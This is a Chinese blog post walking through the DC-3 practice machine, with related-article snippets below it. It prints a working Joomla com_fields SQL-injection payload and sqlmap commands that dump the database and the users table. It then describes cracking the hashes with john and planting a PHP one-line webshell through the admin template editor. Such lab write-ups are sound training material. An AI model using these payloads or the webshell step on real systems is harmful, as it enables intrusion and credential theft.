DC-3靶机

于 2024-08-01 18:55:11 发布
阅读量313 收藏 2
点赞数 9
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67480384/article/details/140854920
版权

IP扫描
image.png
端口扫描
image.png
访问80端口
image.png
dirsreach目录探测
dirsearch -u http://192.168.237.157
发现后台登录页面
image.png
后台登录页面
image.png
发现后台cms框架,百度一下joomla框架有什么漏洞
文章地址
https://www.cnblogs.com/arrest/articles/17660026.html
发现有sql注入漏洞,直接把他的poc拿过来用
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))
sqlmap
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" --dbs
获取数据库
image.png
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" -D joomladb --tables
获取表名
image.png
image.png
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" -D joomladb -T “#__users” --columns
获取列名
image.png
image.png
image.png

发现用户名和密码,利用kali自带的john工具解密
先将密码保存到txt文件中
image.png
john工具
image.png
登录
image.png
image.png
image.png
bezz

image.png
发现文件上传功能点
image.png
image.png
新建文件
image.png
写入一句话木马
image.png
image.png
蚁剑进行连接
image.png
image.png

Sɪʟᴇɴᴛོ.498
关注
DC-3 靶机
weixin_63492470的博客
03-11 5464
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
DC-3靶机渗透
weixin_45349299的博客
01-02 585
title: DC-3靶机渗透详解tags: DC系列靶机categories: 学习笔记。
dc-3 靶机渗透学习
..
03-17 3580
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误。 vim /etc/network/interfacers 改成 vim /etc/network/interfaces Vulnhub靶机检测不到IP地址_阿帅start的博客-CSDN博客_靶机没有ip 信息收集 使用nmap对当前网段进行扫描 nmap -sP 192.168.202.0/24 在排除kali攻击机和物理机ip后,对192.168.2...
DC-3靶机渗透测试过程(个人学习)
m0_59028058的博客
06-03 2246
下载官网地址:https://www.攻击机kali的IP地址:192.168.37.129kali和DC-3这里都用NAT模式.DC-3需要多修改一些东西把IDE里面的改成IDE 0:0。
Vulnhub 靶机实战系列 DC-3靶机
rumil的博客
04-15 840
发现网站管理后台等信息,结合浏览器插件发现使用joomla CMS,使用kali当中jooscn工具进行扫描,如果没有安装即可。点击新建文件即可,在html/处新建php文件,也可上传,但是不一定成功,可以创建文件后将代码复制进去。根据前面信息收集到的内容,采用得CMS和版本信息,进行漏洞搜索,是否有可利用的漏洞。根据漏洞信息,进行漏洞利用,查看一下文件内容,尝试利用,sqlmap爆数据库。找上传点,或者可以查看代码或可执行代码的地方,找到扩展处功能处,尝试。发现有at,可以尝试提权,但是未果。
dc-3靶机渗透
tmyzxy1314的博客
07-04 950
dc-3靶机下载链接:启动靶机遇到的问题解决文章在下面kali最新版 dc-3靶机 两台机器都在vmware上运行 网络设置NAT模式。
DC-3靶机渗透详细流程
braty_的博客
01-24 764
DC-3 靶机渗透详细流程
DC-3 靶机详解
TonyChaoWei的博客
02-11 1164
DC-3靶机
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 2163
DC-3靶机渗透测试详细教程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8476
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
在Pycharm中配置集成Git,内附详细文档html+Git-2.46.2-64-bit.exe
09-28
资源来自https://gitforwindows.org/;关于如何将git与pycharm连接,可参考https://zhuanlan.zhihu.com/p/660854965
平面口罩打片机_包括零件图_机械3D图可修改打包下载.rar
09-28
平面口罩打片机_包括零件图_机械3D图可修改打包下载.rar
基于Android平台的Java老年人健康管理应用设计源码
09-28
该应用是一款基于Android平台的Java开发老年人健康管理应用,源代码包含172个文件,其中包括61个Java源文件、56个XML布局文件、40个PNG图像资源、4个Gradle构建脚本、3个Git忽略规则、2个属性文件和少量其他文件类型,旨在为老年人提供便捷的健康管理服务。
技术资料分享FPGA入门系列实验教程V1.0.zip
09-28
技术资料分享FPGA入门系列实验教程V1.0.zip
崔玉涛 婴儿辅食表,用于6到12个月的婴儿
最新发布
09-28
崔玉涛 婴儿辅食表,用于6到12个月的婴儿
基于Vue框架的Digital Twin开发设计源码
09-28
该项目是基于Vue框架的Digital Twin开发设计源码,由38个文件组成,涉及TypeScript、JavaScript、Vue、CSS、HTML等多种编程语言,包括9个TypeScript文件、6个JavaScript文件、5个JSON文件、5个Vue文件、3个SVG文件、2个Markdown文件、2个WebAssembly文件、1个Git忽略文件、1个HTML文件和1个CSS文件。该源码旨在提供大学生在线学术交流的平台,助力学术创新与协作。
渗透DC-1靶机设计思路
05-24
3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值